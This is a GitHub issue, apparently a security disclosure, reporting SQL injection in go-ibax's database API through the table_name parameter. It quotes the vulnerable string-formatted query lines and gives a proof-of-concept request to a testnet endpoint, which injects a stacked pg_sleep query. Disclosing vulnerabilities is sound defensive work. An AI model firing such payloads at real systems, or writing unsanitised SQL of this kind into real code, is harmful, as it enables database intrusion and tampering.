Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability via table_name parameter #2061

Open
4 tasks done
QSec-Team opened this issue Oct 24, 2022 · 0 comments
Open
4 tasks done

SQL injection vulnerability via table_name parameter #2061

QSec-Team opened this issue Oct 24, 2022 · 0 comments

Comments

@QSec-Team
Copy link

QSec-Team commented Oct 24, 2022

Describe the bug

SQL Injection vulnerability in /packages/api/database.go of go-ibax via table_name parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.

file:

sqlQuest = fmt.Sprintf(`select * from "%s" order by %s offset %d limit %d`, tableName, execOrder, (page-1)*limit, limit)

sqlQuest = fmt.Sprintf(`select * from "%s" where %s order by %s offset %d limit %d`, tableName, where, execOrder, (page-1)*limit, limit)

commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174

POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:

order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&limit=1&page=1

② with where parameter :
order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&where=1=1&limit=1&page=1

Reproduction

Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:

order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&limit=1&page=1
image

② with where parameter :
order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&where=1=1&limit=1&page=1
image

as you can see, when I use pg_sleep, the request is delayed 10s.

System Info

*

Logs

No response

Validations

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant